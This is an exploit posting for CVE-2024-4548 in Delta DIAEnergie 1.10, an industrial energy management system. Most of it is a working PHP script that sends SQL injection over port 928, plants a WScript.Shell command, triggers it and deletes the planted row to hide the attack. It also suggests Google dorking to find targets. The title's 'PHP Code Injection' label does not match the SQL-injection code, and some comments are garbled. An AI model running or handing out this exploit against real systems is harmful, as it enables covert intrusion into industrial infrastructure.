=============================================================================================================================================
| # Title : DIAEnergie 1.10 =============================================================================================================================================
| # Title : DIAEnergie 1.10 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.deltaww.com/en-US/products/DIAEnergie-Industrial-Energy-Management-System/ALL/ |
=============================================================================================================================================
POC :
[+] Dorking ?n Google Or Other Search Enggine.
[+] Code Description: The code attempts to establish a connection with the targeted server over the network.
If the connection is successful, it sends a malicious SQL query to inject commands into the database.
After injection, the script cleans the logs to ensure that the attack is not easily detected.
( https://packetstorm.news/files/id/180334/ CVE-2024-4548 )
[+] save code as poc.php.
[+] Set Target : line 114
[+] USage : php poc.php
[+] PayLoad :
<?php
class CustomSQLInjection
{
const TARGET_PORT = 928;
const TARGET_HOST = 'target_host'; // ?? ????? ????? ???
private $payload;
public function __construct($cmd)
{
// ????? ??????? ?????? ???????
$this->payload = "CreateObject(\"WScript.Shell\").Run(\"cmd /c $cmd\")";
}
public function check()
{
try {
$sock = $this->connect();
fwrite($sock, 'Who is it?');
$res = fread($sock, 1024);
if (empty($res)) {
echo "Received an empty response.\n";
return 'Unknown';
}
echo "Who is it response: $res\n";
preg_match('/\b\d+\.\d+\.\d+\.\d+\b/', $res, $version);
if (empty($version)) {
return 'Detected';
}
echo "Version retrieved: " . $version[0] . "\n";
if (version_compare($version[0], '1.10.1.8610', '>')) {
return 'Safe';
}
return 'Appears';
} catch (Exception $e) {
echo "Error: " . $e->getMessage() . "\n";
return 'Unknown';
}
}
public function exploit()
{
// ??? ???????
$this->execute_command($this->payload);
}
private function execute_command($cmd)
{
$scname = bin2hex(random_bytes(rand(5, 10)));
echo "Using random script name: $scname\n";
$random_date = date('Y-m-d', rand(2024, 2026)) . '-' . sprintf('%02d', rand(1, 12)) . '-' . sprintf('%02d', rand(1, 29));
echo "Using random date: $random_date\n";
$random_time = sprintf('%02d:%02d:%02d', rand(0, 23), rand(0, 59), rand(0, 59));
echo "Using random time: $random_time\n";
try {
echo "Sending SQL injection...\n";
$sock = $this->connect();
fwrite($sock, "RecalculateHDMWYC~$random_date $random_time~$random_date $random_time~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'$scname', N'$cmd', N'', N'');--");
$res = fread($sock, 1024);
if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
throw new Exception("Unexpected reply from the server: $res");
}
echo "Injection - Expected response received: $res\n";
fclose($sock);
// Trigger the script execution
echo "Triggering script execution...\n";
$sock = $this->connect();
fwrite($sock, "RecalculateScript~$random_date $random_time~$random_date $random_time~1");
$res = fread($sock, 1024);
if ($res !== 'Recalculate Script Start!') {
throw new Exception("Unexpected reply from the server: $res");
}
echo "Trigger - Expected response received: $res\n";
fclose($sock);
echo "Script successfully injected, check thy shell.\n";
} catch (Exception $e) {
echo "Error: " . $e->getMessage() . "\n";
$this->cleanup($scname);
}
}
private function cleanup($scname)
{
echo "Cleaning up database...\n";
try {
$sock = $this->connect();
fwrite($sock, "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='$scname';--");
$res = fread($sock, 1024);
if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
throw new Exception("Unexpected reply from the server: $res");
}
echo "Cleanup - Expected response received: $res\n";
fclose($sock);
} catch (Exception $e) {
echo "Error during cleanup: " . $e->getMessage() . "\n";
}
}
private function connect()
{
// ??????? ???????? fsockopen
$sock = fsockopen(self::TARGET_HOST, self::TARGET_PORT, $errno, $errstr, 10);
if (!$sock) {
throw new Exception("Connection failed: $errstr ($errno)");
}
return $sock;
}
}
// ????? ????? ???? ???? ??????
$cmd = 'dir'; // ?????? ??? ????? ?????? ???? ???? ?? ??????
$exploit = new CustomSQLInjection($cmd);
$exploit->check();
$exploit->exploit();
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================